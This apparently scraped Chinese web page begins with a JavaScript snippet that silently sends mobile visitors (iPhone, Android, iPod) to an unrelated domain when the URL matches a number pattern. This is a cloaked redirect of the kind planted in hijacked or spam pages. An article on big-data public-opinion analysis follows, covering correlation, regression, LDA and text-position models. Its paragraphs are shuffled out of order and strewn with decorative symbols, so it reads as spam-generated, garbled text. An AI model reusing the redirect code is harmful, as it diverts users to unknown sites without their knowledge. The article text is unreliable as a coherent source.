//手机端跳转 if (navigator.userAgent.indexOf("iPhone") > 0 || navigator.userAgent.indexOf("Android") > 0 || navigator.userAgent.indexOf("iPod") > 0) { var patt1 = new RegExp("[0-9]*_[0-9]*"); var url = patt1.exec(location.href); if (url != "") { self.location = "http://gcbrmy.com"; } }
这种方法能够大大缩短文本处理时间,通过计算实现文本内容归类◆■★★■,提高舆情子话题提取效率★◆。
一方面,将相关分析用于舆情研究,适用于分辨看似无关的信息间潜在的相互关联,能够从庞杂的数据中发掘足以影响全局的非确定关系,从而确定如何在复杂环境中精准研判舆情态势。
如何用好这些数据,高效提取有价值的信息,是在数据丰富的今天需要探讨的话题。
■■★“大数据”已俨然成为时代热词,社会学家说它是一座蕴含了大量信息的富矿◆★◆■,统计学家却认为庞杂的结构为数据分析带来了巨大的挑战,从中提取有用信息犹如大海捞针★■◆■。
传统舆情是基于简单信息的搜集整理工作。但数字时代数据量巨大、冗余信息繁杂。在信息和数据形式不断更新的情况下,舆情研究方法同样需要迭代。当下,舆情研究方法存在哪些问题?复杂的数据环境对研究方法又提出了哪些新要求?一起来看。
数据是取之不尽的可再生资源,研究者根据日常工作的专长和角度不同,掌握的数据形式大为不同。
2018年6月23日,泰国一支青少年足球队被困洞穴★★■,7月10日获救。该事件引发全球媒体和公众广泛持续的关注。笔者在分析该事件时发现,传统媒体报道和社交平台热议话题间存在相关关系,两个舆论场相互影响的复杂渐变关系还原了舆论触发和影响机制。
例如◆★■★,以此分析中美关系舆情,可以直观看到中美受众的不同立场表达■◆★,并根据文本位置距离判断未来发展趋势。
前文的分析方法多将文本分裂为词组■◆■■★,计算使用的矩阵也常常忽略了语句连接在一起的整体含义。采用社会网络分析方法,可以描绘出词语间的距离与联系■◆■,可以在一定程度上探索其出现的语境,还原断裂的文本。
大数据舆情分析面临着数据量大、维度多样、结构复杂等问题◆★■。研究对象也从受众个体发展到了受众之间■◆◆、传受之间的复杂网络关系,甚至杂糅了时间、空间维度等场景化信息。但现有的研究仍以数量统计和词频分析为主,难以深入挖掘大数据的潜在价值。
因此,强化以行业实践为基础的合作机制◆★◆,是推动数据舆情化和舆情数据化的大势所趋■■◆■。
另一方面★★◆■,回归分析应用到舆情分析领域◆◆★◆★,能够探究相关变量间的因果关系及发展走势,寻找舆情演变规律模型。通过建模分析,不仅可以判断不同议题◆★■★、国家■■★◆◆★、媒体间的关系★★◆■,还能进一步探究相关舆论的未来走势■★◆■。
例如,在国际传播研究中,首先要了解国际舆情。通过统计给定时间内的舆情数量规模、情感倾向、话题细分等数据◆◆◆,能够快速勾勒基本轮廓,便于研究者了解某一时段的静态舆情特征。
例如,以各国媒体就新冠肺炎疫情的报道为素材建模,能够从宏观角度把握国际舆论◆■★■◆,并直观展现各国媒体新闻叙事的关系★■◆★◆★,探明媒体报道与国际舆论的相互影响■■★,找到国际舆情的演变路径。
舆情发展是一个分阶段的动态过程◆★,通过对数据所包含的维度进行基础统计计算,能够获得横向切面和纵向发展的双向描述,进而掌握舆情全貌。
把握舆论脉搏★◆,洞悉舆情走向,是信息化社会了解民意的重要因素。数据与舆情结合的产物——数据舆情也已应时代要求而生,亟待从业人员理论结合实践,吸纳科学分析方法,提升数据处理和舆情研判能力■◆■◆◆。
舆情研判是指通过特定方法对舆情信息的特性、态势■■◆★◆★、走向进行研究判断的专业工作。大数据舆情研判需要借力传统量化研究方法,采用相关分析探索不同变量间相互作用的关系,采用回归分析探索变量间的依赖关系■◆★★,并预测变量的发展趋势◆■。
采用科学的研究方法■★★★■★、纳入大数据模型,也是互联网环境下舆情研究的发展趋势◆◆◆■★■,为更加全面立体地掌握舆情动态奠定了科学基础。
如前文所述■■◆◆◆★,文本之中也隐藏着复杂的词语网络。探询文本的共现网络◆◆,是还原语境的重要路径。
数据舆情行业研究★◆,需要以数据积累为目的长期挖掘和存储■★★◆★◆,注重日常数据的挖掘和积累,不断拓展数据边缘。搭建庞大的数据仓库★◆■■★◆,提升数据使用效率★◆★◆■■,是发展数据舆情的首要条件。
科学分析大数据有助于研究者打开视野,从更开阔的角度切入研究。根据不同研究意图搭建复杂模型检验,深入因果推论,可以实现舆情研究的数据化★◆★◆★、动态化,也可以加强趋势研判的延展性◆★★■★、科学性★■◆。
以往针对文本的分析方法分析周期长、研究耗时长■★、人工工作量大★★,难以适应舆情研究求快求全的现实要求。因此便需借力量化文本分析方法,集中处理数十万乃至数千万量级的文本内容。
文本位置估计模型是政治学领域的成熟算法★★◆■,旨在通过计算文本中包含的政治学词汇特征★★■,判断文本的左倾向。舆情研究可以借用该算法原理,通过计算词频、词距■★◆◆■、词语间共现关系等信息◆◆■■◆★,计算特定文本的相对位置,判断研究对象的态度倾向差异■★。
不同维度的数据都需要专业的分析方法■■■◆◆,继而革新了舆情研究的思维方式★■。基于丰富的舆情分析理论和经验,科学研究方法才能使舆情研究如虎添翼■★◆■◆■。
在舆情研究领域,数据分析能力具体体现为科学研究方法的掌握和使用能力■■◆■。为进一步提高舆情分析的效率和质量,强化量化研判与舆情工作的深度融合■■■■◆★,提升数据分析能力,是发展数据舆情的必要条件◆★◆。
LDA(Latent Dirichlet Allocation)是统计学中常用的一种降维分析方法,即降低复杂的文本数据包含的维度。通过运算归类,具有相同特性的文本被识别为一组★■■★■,进而实现文本主题的机器分类。这一算法常用来提取子话题■◆★★◆★。
为深入研究国际舆情★◆◆◆,还需长期追踪基础统计量。持续累积同口径数据列◆■,便能回溯其发展趋势,并通过时间序列模型预测舆情发展态势。
大数据背后隐藏着肉眼难以识别的深层信息★◆,尤其是在面对大量文本数据时◆★■★,难以靠传统分析方法直接获得全面信息◆■◆。